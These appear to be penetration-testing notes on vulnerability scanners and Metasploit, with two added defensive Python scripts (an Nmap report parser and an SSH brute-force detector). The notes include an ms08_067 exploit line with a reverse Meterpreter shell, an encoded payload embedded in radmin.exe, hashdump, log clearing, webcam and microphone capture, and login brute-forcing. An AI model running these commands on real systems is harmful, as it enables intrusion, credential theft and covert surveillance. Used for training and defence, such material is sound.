Vulnerability scanning
- Look up exploits: searchsploit tomcat (the right-hand column is the path to the exploit's write-up)
- Install the OpenVAS vulnerability scanner:
  Download and install the package: apt-get install openvas
  Set up: openvas-setup
- Install Nessus:
  http://www.tenable.com/products/nessus/select-your-operating-system
  - Install: dpkg -i
  - Install path: /opt/nessus
  - Start the service: /etc/init.d/nessusd start
  - Management address: https://127.0.0.1:8834
  - Register an activation code: http://www.tenable.com/products/nessus-home
- Install NEXPOSE (commercial and very expensive, several hundred thousand a year)
WINDOWS buffer overflow
- FUZZER (only useful against old versions such as XP and Windows 2003)
  - SLMail 5.5.0 Mail Server
  - ImmunityDebugger_1_85_setup.exe
  - mona.py
Shellcode attack: shellcode is machine code written out as hex bytes. After the overflow has overwritten the EIP register, a piece of shellcode that the CPU can execute is placed in memory so that it opens an nc connection. The software vulnerability is exploited with that specific shellcode, and a remote attack program written in C or Python then obtains root privileges on the target machine.
MSF tools:
- Start: msfconsole -q, msfdb start, db_status, db_connect -h /usr/share/metasploit-framework/modules/
- Basic usage:
  - db_nmap 192.168.0.115; hosts; hosts 192.168.0.115
  - db_disconnect / db_connect
  - db_import /root/nmap.xml
  - db_export -f xml /root/bak.xml
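The db_import command above consumes Nmap's XML report. The following script, an added example that is not part of these notes, parses that same format into a host/service inventory and flags the services that the scanner modules later in these notes go after (SSH, MySQL, MSSQL, RDP, SMB, VNC), which is the list a defender wants to review for patch level and default credentials. The XML document and the 192.0.2.x addresses are constructed for the example; the function names and the watchlist are assumptions of the example, not Metasploit's own.

```python
"""Parse an Nmap XML report (the format db_import reads) into a host/service
inventory. Added example; the sample XML below is constructed, not a real scan."""
import xml.etree.ElementTree as ET

# Constructed Nmap XML for three hosts (RFC 5737 documentation addresses).
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -oX scan.xml 192.0.2.0/24">
  <host>
    <status state="up" reason="arp-response"/>
    <address addr="192.0.2.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh" product="OpenSSH" version="7.4"/></port>
      <port protocol="tcp" portid="3306"><state state="open"/><service name="mysql"/></port>
      <port protocol="tcp" portid="445"><state state="filtered"/><service name="microsoft-ds"/></port>
    </ports>
  </host>
  <host>
    <status state="up" reason="syn-ack"/>
    <address addr="192.0.2.20" addrtype="ipv4"/>
    <address addr="00:11:22:33:44:55" addrtype="mac"/>
    <ports>
      <port protocol="tcp" portid="3389"><state state="open"/><service name="ms-wbt-server"/></port>
      <port protocol="udp" portid="161"><state state="open|filtered"/><service name="snmp"/></port>
    </ports>
  </host>
  <host>
    <status state="down" reason="no-response"/>
    <address addr="192.0.2.30" addrtype="ipv4"/>
  </host>
</nmaprun>
"""


def parse_nmap_xml(xml_text):
    """Return {ipv4: [(port, proto, service, product)]} for hosts that are up,
    keeping only ports whose state is exactly 'open' (not filtered/open|filtered)."""
    root = ET.fromstring(xml_text)
    inventory = {}
    for host in root.findall("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue  # down hosts carry no port data worth keeping
        addr = None
        for a in host.findall("address"):
            if a.get("addrtype") == "ipv4":
                addr = a.get("addr")
        if addr is None:
            continue
        services = []
        ports = host.find("ports")
        if ports is not None:
            for port in ports.findall("port"):
                state = port.find("state")
                if state is None or state.get("state") != "open":
                    continue
                svc = port.find("service")
                name = svc.get("name", "") if svc is not None else ""
                product = ""
                if svc is not None:
                    product = " ".join(filter(None, [svc.get("product"), svc.get("version")]))
                services.append((int(port.get("portid")), port.get("protocol"), name, product))
        inventory[addr] = sorted(services)
    return inventory


# Service names (as Nmap reports them) matching the scanner modules in these notes.
# This watchlist is an assumption of the example.
WATCHLIST = {"ssh", "mysql", "ms-sql-s", "ms-wbt-server", "microsoft-ds", "vnc"}


def exposed_services(inventory, watchlist=WATCHLIST):
    """Return [(host, port, service)] for open watchlist services: the assets to
    check for patching and default/blank credentials before a scanner does."""
    hits = []
    for host, services in sorted(inventory.items()):
        for port, _proto, name, _product in services:
            if name in watchlist:
                hits.append((host, port, name))
    return hits


if __name__ == "__main__":
    inv = parse_nmap_xml(SAMPLE_NMAP_XML)
    for host, svcs in inv.items():
        print(host, svcs)
    print("watchlist hits:", exposed_services(inv))
```

The filtered port 445 and the open|filtered UDP port are deliberately dropped: only a port Nmap confirmed open is counted as exposure, so the hit list stays small enough to act on.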
- Using the mysql_login module:
  - Enter the module: 1. search mysql_login, 2. use auxiliary/scanner/mysql/mysql_login, 3. show options
  - Use the module: 1. set USERNAME root, 2. set BLANK_PASSWORDS yes, 3. set RHOSTS 192.168.1.22, 4. show options, 5. run, 6. db_export -f xml /root/msfbak.xml, 7. back
- For example:
- Console commands:
  - set / unset / setg / unsetg / save
  - run / exploit
  - jobs / kill 0
  - load / unload / loadpath
  - sessions -l / -i (shell, Meterpreter session, VNC)
  - route (direct a session's traffic through a route)
  - irb (Framework::Version)
  - resource (msfconsole -r a.rc)
- Generating a payload:
  - 1. use payload/windows/shell_bind_tcp
  - generate / generate -b '\x00' (binary encoding; -b filters out bad characters)
  - Generate the payload: generate -b '\x00' -t exe -e x86/shikata_ga_nai -i 5 -k -x /usr/share/windows-binaries/radmin.exe -f /root/1.exe
- Meterpreter: controlling the reverse shell
  - Basic commands: help, background, run, bgrun, cd, ls, cat, pwd, dir, mkdir, mv, rm, rmdir, edit, lpwd, lcd, clearev, download / upload (e.g. upload /usr/share/windows-binaries/nc.exe c:\\windows\\system32), execute -f cmd.exe -i -H, getuid, getsystem, getprivs, getproxy, getpid, hashdump, run post/windows/gather/hashdump, sysinfo, ps, kill, migrate, reboot, shutdown, shell, show_mount, search -f autoexec.bat, arp, netstat, ipconfig, ifconfig, route, idletime, resource, record_mic, webcam_list, webcam_snap -i 1 -v false
- msfcli (removed from the framework in June 2015; replaced by the msfconsole -x command)
  - msfconsole -x "use exploit/windows/smb/ms08_067_netapi; set RHOST 1.1.1.1; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 1.1.1.8; set LPORT 5555; set target 34; exploit"
- Auxiliary scanning modules
  - search arp; use auxiliary/scanner/discovery/arp_sweep
  - search portscan; use auxiliary/scanner/portscan/syn
  - search udp_sweep / udp_probe; use auxiliary/scanner/discovery/udp_sweep
  - use auxiliary/scanner/ssh/ssh_version
  - use auxiliary/scanner/ssh/ssh_login; set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt; set VERBOSE false; run (password brute force)
  - use auxiliary/scanner/ssh/juniper_backdoor (device backdoor)
  - use auxiliary/scanner/ssh/ssh_login_pubkey; set KEY_FILE id_rsa; set USERNAME root; run (public-key login)
  - use auxiliary/scanner/mssql/mssql_ping (connect to MSSQL)
  - use auxiliary/scanner/mssql/mssql_login (brute-force MSSQL)
  - use auxiliary/admin/mssql/mssql_exec (remote execution)
  - use auxiliary/scanner/vnc/vnc_login (password cracking)
  - use auxiliary/scanner/vnc/vnc_none_auth (reports "supported : None, free access!" when the server requires no authentication)
  - use auxiliary/scanner/rdp/ms12_020_check (Remote Desktop vulnerability check)
  - use auxiliary/scanner/smb/smb_version
  - use auxiliary/scanner/smb/pipe_auditor
  - use auxiliary/scanner/smb/pipe_dcerpc_auditor
  - use auxiliary/scanner/smb/smb_enumshares
  - use auxiliary/scanner/smb/smb_enumusers
  - use auxiliary/scanner/smb/smb_lookupsid
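The ssh_login run above (a userpass wordlist against root with VERBOSE off) and the earlier mysql_login run both leave a dense burst of failed logins from one source address on the target. The script below, an added example that is not part of these notes, shows the corresponding detection on the defender's side for the SSH case: it parses OpenSSH auth.log lines, flags a source that accumulates a threshold of failures inside a sliding window, and marks the alert when the same source later gets an "Accepted", the signature of a guess that worked. The log lines, the hostnames and the 192.0.2.x / 198.51.100.x addresses are constructed for the example; the function names and the threshold/window defaults are assumptions of the example.

```python
"""Flag SSH password guessing in OpenSSH auth.log output. Added example; the
log lines below are constructed, not captured from a real host."""
import re
from collections import defaultdict
from datetime import datetime

# Constructed syslog-style sshd lines (the year is omitted, as in the real format).
SAMPLE_AUTH_LOG = """\
Mar  3 10:15:01 host sshd[2201]: Failed password for root from 192.0.2.77 port 50100 ssh2
Mar  3 10:15:02 host sshd[2203]: Failed password for root from 192.0.2.77 port 50101 ssh2
Mar  3 10:15:02 host sshd[2205]: Failed password for invalid user admin from 192.0.2.77 port 50102 ssh2
Mar  3 10:15:03 host sshd[2207]: Failed password for root from 192.0.2.77 port 50103 ssh2
Mar  3 10:15:04 host sshd[2209]: Failed password for root from 192.0.2.77 port 50104 ssh2
Mar  3 10:15:05 host sshd[2211]: Failed password for root from 192.0.2.77 port 50105 ssh2
Mar  3 10:15:09 host sshd[2213]: Accepted password for root from 192.0.2.77 port 50106 ssh2
Mar  3 10:20:00 host sshd[2300]: Failed password for alice from 198.51.100.5 port 40000 ssh2
Mar  3 10:40:00 host sshd[2301]: Failed password for alice from 198.51.100.5 port 40001 ssh2
Mar  3 10:40:30 host sshd[2302]: Accepted publickey for alice from 198.51.100.5 port 40002 ssh2
"""

# Matches both "Failed password for root from ..." and
# "Failed password for invalid user admin from ...".
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>password|publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)


def parse_sshd(text, year=2024):
    """Return [(timestamp, ip, user, result, method)]; non-auth lines are skipped.
    The year is supplied by the caller because syslog timestamps lack it."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["ip"], m["user"], m["result"], m["method"]))
    return events


def detect_bruteforce(events, threshold=5, window_s=60):
    """Sliding-window rule: a source IP with >= threshold failures within
    window_s seconds is flagged once; a later Accepted from that IP sets
    success_after, which should escalate the alert to a probable compromise."""
    recent_fails = defaultdict(list)
    alerts = {}
    for ts, ip, _user, result, _method in sorted(events):
        if result == "Failed":
            recent_fails[ip].append(ts)
            # Drop failures that fell out of the window ending at this event.
            recent_fails[ip] = [t for t in recent_fails[ip] if (ts - t).total_seconds() <= window_s]
            if len(recent_fails[ip]) >= threshold and ip not in alerts:
                alerts[ip] = {
                    "first_seen": recent_fails[ip][0],
                    "failures": len(recent_fails[ip]),
                    "success_after": False,
                }
        elif result == "Accepted" and ip in alerts:
            alerts[ip]["success_after"] = True
    return alerts


if __name__ == "__main__":
    for ip, info in detect_bruteforce(parse_sshd(SAMPLE_AUTH_LOG)).items():
        print(ip, info)
```

With the defaults, 192.0.2.77 is flagged at its fifth failure inside one minute and escalated by the "Accepted password" that follows; 198.51.100.5, with two failures twenty minutes apart, is not. The window matters more than the raw count: a wordlist run produces failures seconds apart, while a user mistyping a password does not.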